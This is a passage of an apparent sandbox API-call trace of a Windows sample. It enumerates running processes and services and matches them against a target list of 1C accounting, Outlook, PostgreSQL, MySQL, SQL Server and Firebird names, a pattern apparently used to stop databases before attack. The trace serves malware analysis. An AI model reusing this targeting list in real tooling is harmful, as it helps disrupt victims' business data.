lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.969] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.969] lstrlenW (lpString="svchost.exe") returned 11 [0272.969] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.970] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.970] lstrlenW (lpString="svchost.exe") returned 11 [0272.970] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.970] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.970] lstrlenW (lpString="svchost.exe") returned 11 [0272.970] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.970] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.971] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.971] lstrlenW (lpString="svchost.exe") returned 11 [0272.971] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.971] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.971] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.971] lstrlenW (lpString="audiodg.exe") returned 11 [0272.971] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0272.971] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0272.971] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0272.971] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0272.971] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0272.971] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0272.972] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0272.972] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.972] lstrlenW (lpString="svchost.exe") returned 11 [0272.972] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.972] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.972] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.972] lstrlenW (lpString="userinit.exe") returned 12 [0272.972] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0272.972] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0272.972] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.973] lstrlenW (lpString="explorer.exe") returned 12 [0272.973] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.973] lstrlenW (lpString="dwm.exe") returned 7 [0272.973] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.973] lstrlenW (lpString="svchost.exe") returned 11 [0272.973] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0272.974] lstrlenW (lpString="ivttvf.exe") returned 10 [0272.974] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.974] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.974] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.974] lstrlenW (lpString="svchost.exe") returned 11 [0272.974] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.974] lstrlenW (lpString="taskhost.exe") returned 12 [0272.974] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.975] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.975] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0272.975] lstrlenW (lpString="dllhost.exe") returned 11 [0272.975] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0272.975] CloseHandle (hObject=0x1d4) returned 1 [0272.975] Sleep (dwMilliseconds=0x1f4) [0273.492] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x41ad350 [0273.492] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0273.492] GetLastError () returned 0xea [0273.492] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xacc) returned 0x3afc178 [0273.492] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3afc178, cbBufSize=0xacc, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3afc178, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0273.492] CloseServiceHandle (hSCObject=0x41ad350) returned 1 [0273.492] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.493] lstrlenW (lpString="AudioSrv") returned 8 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.493] lstrlenW (lpString="BFE") returned 3 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.493] lstrlenW (lpString="CscService") returned 10 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.493] lstrlenW (lpString="DcomLaunch") returned 10 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.493] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.493] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.493] lstrlenW (lpString="Dhcp") returned 4 [0273.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.494] lstrlenW (lpString="Dnscache") returned 8 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.494] lstrlenW (lpString="eventlog") returned 8 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.494] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.494] lstrlenW (lpString="EventSystem") returned 11 [0273.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.494] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.495] lstrlenW (lpString="gpsvc") returned 5 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.495] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.495] lstrlenW (lpString="lmhosts") returned 7 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.495] lstrlenW (lpString="MMCSS") returned 5 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0273.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.495] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.495] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.495] lstrlenW (lpString="MpsSvc") returned 6 [0273.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.496] lstrlenW (lpString="nsi") returned 3 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.496] lstrlenW (lpString="PlugPlay") returned 8 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0273.496] lstrlenW (lpString="Power") returned 5 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.496] lstrlenW (lpString="ProfSvc") returned 7 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.496] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.496] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.496] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.497] lstrlenW (lpString="RpcSs") returned 5 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.497] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.497] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.497] lstrlenW (lpString="SamSs") returned 5 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.497] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.497] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.497] lstrlenW (lpString="Schedule") returned 8 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.497] lstrlenW (lpString="SENS") returned 4 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.497] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.497] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.497] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.497] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.497] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.497] lstrlenW (lpString="Spooler") returned 7 [0273.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.498] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.498] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.498] lstrlenW (lpString="Themes") returned 6 [0273.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.498] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.498] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.498] lstrlenW (lpString="UxSms") returned 5 [0273.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.498] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.498] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.498] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3afc178 | out: hHeap=0x5e0000) returned 1 [0273.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0273.499] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.500] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.500] lstrlenW (lpString="System") returned 6 [0273.500] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.500] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.500] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.500] lstrlenW (lpString="smss.exe") returned 8 [0273.500] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.500] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0273.500] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.500] lstrcmpiW 